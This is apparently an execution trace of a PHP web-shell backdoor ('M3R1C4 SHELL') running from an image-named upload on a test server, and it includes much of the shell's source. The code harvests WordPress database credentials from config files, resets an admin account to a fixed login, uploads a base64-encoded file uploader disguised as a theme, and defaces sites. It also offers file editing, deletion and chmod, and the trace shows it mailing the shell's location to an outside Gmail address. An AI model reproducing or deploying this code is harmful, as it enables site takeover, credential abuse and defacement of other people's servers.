$post2);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t\t$y = date("Y");\r\n\t\t\t\t\t$m = date("m");\r\n\t\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \t \techo "[+] Berhasil...
";\r\n \t \techo "[+] $as

"; \r\n \t } else {\r\n \t echo "[-] Gagal...
";\r\n \t echo "[!!] coba aja manual:
";\r\n \t echo "[+] $target/wp-login.php
";\r\n \t echo "[+] username: $user
";\r\n \t echo "[+] password: $pass

"; \r\n \t }\r\n \t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
WordPress Auto Deface
\r\n\t\t
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t
\r\n\t\t
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp2\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION,true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$link = explode("\\r\\n", $_POST[\'link\']);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link as $dir_config) {\r\n\t\t\t$config = anucurl($dir_config);\r\n\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t$option = $dbprefix."options";\r\n\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t$id = $result[ID];\r\n\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t$target = $result2[option_value];\r\n\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\techo "[-] error, gabisa ambil nama domain nya
";\r\n\t\t\t} else {\r\n\t\t\t\techo "[+] $target
";\r\n\t\t\t}\r\n\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\techo "[-] MySQL Error: ".mysql_error()."

";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t} else {\r\n\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t$www = "m.php";\r\n\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t);\r\n\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t$y = date("Y");\r\n\t\t\t\t$m = date("m");\r\n\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \techo "[+] Berhasil...
";\r\n \techo "[+] $as

"; \r\n } else {\r\n echo "[-] Gagal...
";\r\n echo "[!!] coba aja manual:
";\r\n echo "[+] $target/wp-login.php
";\r\n echo "[+] username: $user
";\r\n echo "[+] password: $pass

"; \r\n }\r\n \tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
WordPress Auto Deface V.2
\r\n\t\t
\r\n\t\tLink Config:
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t
";\r\n\t}\r\n}\r\necho \'
\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'File Upload
\';\r\n}else{\r\necho \'Upload Failed !!
\';\r\n}\r\n}\r\necho \'
\r\n\r\n
\r\n
Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'

\';\r\necho(\' \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'\');\r\n}\r\n//Empety\r\nelseif(isset($_GET[\'option\']) && $_GET[\'opt\'] != \'delete\'){\r\necho \'
\'.$_POST[\'path\'].\'

\';\r\n//Chmod\r\nif($_GET[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'Change Permission Done
\';\r\n}else{\r\necho \'Change Permission Error
\';\r\n}\r\n}\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\necho \'
\r\nPermission : \r\n\r\n\r\n\r\n
\';\r\n}\r\n//\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'
\r\nNew Name : \r\n\r\n\r\n\r\n
\';\r\n}\r\n//Rename file\r\nelseif($_GET[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'Change Name Done
\';\r\n}else{\r\necho \'Change Name Error
\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n\r\necho \'
\r\nNew Name : \r\n\r\n\r\n\r\n
\';\r\n}\r\n//File baru\r\nelseif($_GET[\'opt\'] == \'baru\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n$azz = $_POST[\'path\'];\r\n$newz = "$azz/$new";\r\n\r\n\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'Create File Done [ \'.$new.\' ]
\';\r\n}else{\r\necho \'Create File Error
\';\r\n}\r\nfclose($fp);\r\n}\r\n\r\necho \'
Name :

\';\r\n\r\n$ho = $_POST[\'ngaran1\'];\r\n\r\nif(isset($_POST[\'ngaran\'])){\r\necho \'
\r\n\'.htmlspecialchars(file_get_contents($patc)).\'
\r\n\r\n\r\n\r\n
\';\r\n\t}\r\n\t}\r\n//Edited file\r\nelseif($_GET[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'Edit File Done
\';\r\n}else{\r\necho \'Edit File Error
\';\r\n}\r\nfclose($fp);\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\necho \'
\r\n\'.htmlspecialchars(file_get_contents($patc)).\'
\r\n\r\n\r\n\r\n
\';\r\n}\r\necho \'\';\r\n}else{\r\necho \'
\';\r\n//Delete dir and file\r\nif(isset($_GET[\'option\']) && $_GET[\'opt\'] == \'delete\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\n//Delete dir\r\nif($_GET[\'type\'] == \'dir\'){\r\n\r\nif(rmdir($patc)){\r\necho \'Delete File Done
\';\r\n}else{\r\necho \'Delete File Error
\';\r\n}\r\n}\r\n//buat folder\r\nif($_GET[\'type\'] == \'buat\'){\r\n$haaa = $_POST[\'path\'];\r\n$heee = $_POST[\'name\'];\r\n$hooo = "$haaa/$heee";\r\n$new = $haaa.\'/\'.htmlspecialchars($heee);\r\nif(!mkdir($new)){\r\necho \'Create Folder Error
\';\r\n}else{\r\necho \'Create Folder Done
\';\r\n}\r\n}\r\n//Delete file\r\nelseif($_GET[\'type\'] == \'file\'){\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\nif(unlink($patc)){\r\necho \'Delete File Done
\';\r\n}else{\r\necho \'Delete File Error
\';\r\n}\r\n}\r\n}\r\necho \'\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \' \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "\r\n\r\n\r\n\r\n\r\n\r\n";\r\n}\r\necho \'
\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "\r\n\r\n\r\n\r\n\r\n";\r\n}\r\necho \'
Name Size Permission Options

.. NONE LINK New File | New Folder
$dir DIR ";\r\nif(is_writable("$path/$dir")) echo \'\';\r\nelseif(!is_readable("$path/$dir")) echo \'\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'\';\r\n\r\necho " \r\nRename Delete Chmod\r\n\r\n
$file ".$size." ";\r\nif(is_writable("$path/$file")) echo \'\';\r\nelseif(!is_readable("$path/$file")) echo \'\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'\';\r\necho " \r\nEdit Rename Delete Chmod\r\n
\r\n\';\r\n}\r\necho \'
Copyright © Trenggalek Cyber Army\r\n\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!' /var/www/html/uploads/img_x.phtml 70 0 3 9 0 0.005812 890592 set_time_limit 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 7 1 0 3 9 1 0.005838 890656 3 9 R FALSE 3 10 0 0.005853 890624 error_reporting 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 8 1 0 3 10 1 0.005868 890664 3 10 R 22527 3 11 0 0.005882 890624 get_magic_quotes_gpc 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 10 0 3 11 1 0.005897 890624 3 11 R FALSE 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 23 $kime = 'aqpunk21@gmail.com' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 24 $baslik = 'Pesanan Shell datang Cuk !' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 25 $spyhackerz = 'Dosya Yolu : /var/www/html\r\n' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 26 $spyhackerz .= 'Server Admin : webmaster@localhost\r\n' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 27 $spyhackerz .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 28 $spyhackerz .= 'Shell Link : http://localhost/uploads/img_x.phtml\r\n' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 29 $spyhackerz .= 'Avlanan Site : localhost\r\n' 3 12 0 0.006015 890848 mail 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 30 3 'aqpunk21@gmail.com' 'Pesanan Shell datang Cuk !' 'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/img_x.phtml\r\nAvlanan Site : localhost\r\n' 3 12 1 0.006733 890944 3 12 R FALSE 3 13 0 0.006757 890848 php_uname 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 73 0 3 13 1 0.006774 890960 3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 3 14 0 0.006796 890848 getcwd 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 78 0 3 14 1 0.006811 890896 3 14 R '/var/www/html/uploads' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 78 $path = '/var/www/html/uploads' 3 15 0 0.006841 890896 str_replace 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 80 3 '\\' '/' '/var/www/html/uploads' 3 15 1 0.006858 890992 3 15 R '/var/www/html/uploads' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 80 $path = '/var/www/html/uploads' 3 16 0 0.006886 890896 explode 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 81 2 '/' '/var/www/html/uploads' 3 16 1 0.006902 891472 3 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 81 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 0 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 85 $a = TRUE 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 1 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 2 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 3 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 4 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++ 3 17 0 0.007331 891400 scandir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1432 1 '/var/www/html/uploads' 3 17 1 0.007374 892024 3 17 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php'] 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1432 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php'] 3 18 0 0.007499 891992 getcwd 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1433 0 3 18 1 0.007514 892040 3 18 R '/var/www/html/uploads' 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1433 $pa = '/var/www/html/uploads' 3 19 0 0.007543 892088 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/.' 3 19 1 0.007562 892152 3 19 R TRUE 3 20 0 0.007576 892120 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/..' 3 20 1 0.007593 892168 3 20 R TRUE 3 21 0 0.007607 892128 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/.htaccess' 3 21 1 0.007624 892168 3 21 R FALSE 3 22 0 0.007639 892128 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/data' 3 22 1 0.007655 892168 3 22 R TRUE 3 23 0 0.007670 892128 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1451 1 '/var/www/html/uploads/data' 3 23 1 0.007688 892168 3 23 R TRUE 3 24 0 0.007702 892128 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1453 1 '/var/www/html/uploads/data' 4 25 0 0.007717 892128 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/data' 4 25 1 0.007731 892168 4 25 R 16895 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 16895 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1510 $info = 'd' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= 'x' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= 'x' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= 'w' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= 'x' 3 24 1 0.007868 892168 3 24 R 'drwxrwxrwx' 3 26 0 0.007882 892128 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1454 1 '/var/www/html/uploads/data' 3 26 1 0.007899 892168 3 26 R TRUE 3 27 0 0.007914 892136 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/img_x.phtml' 3 27 1 0.007973 892184 3 27 R FALSE 3 28 0 0.007989 892144 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/prepend.php' 3 28 1 0.008006 892184 3 28 R FALSE 3 29 0 0.008021 892128 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/.' 3 29 1 0.008037 892152 3 29 R FALSE 3 30 0 0.008050 892120 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/..' 3 30 1 0.008066 892168 3 30 R FALSE 3 31 0 0.008079 892128 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/.htaccess' 3 31 1 0.008095 892168 3 31 R TRUE 3 32 0 0.008108 892128 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/.htaccess' 3 32 1 0.008123 892168 3 32 R 64 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 0.0625 3 33 0 0.008148 892072 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 0.0625 3 3 33 1 0.008164 892144 3 33 R 0.063 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 0.063 2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '0.063 KB' 3 34 0 0.008203 892168 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/.htaccess' 3 34 1 0.008221 892208 3 34 R FALSE 3 35 0 0.008234 892168 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/.htaccess' 3 35 1 0.008255 892208 3 35 R TRUE 3 36 0 0.008268 892168 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/.htaccess' 4 37 0 0.008283 892168 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/.htaccess' 4 37 1 0.008296 892208 4 37 R 33188 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33188 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r' 3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w' 3 A 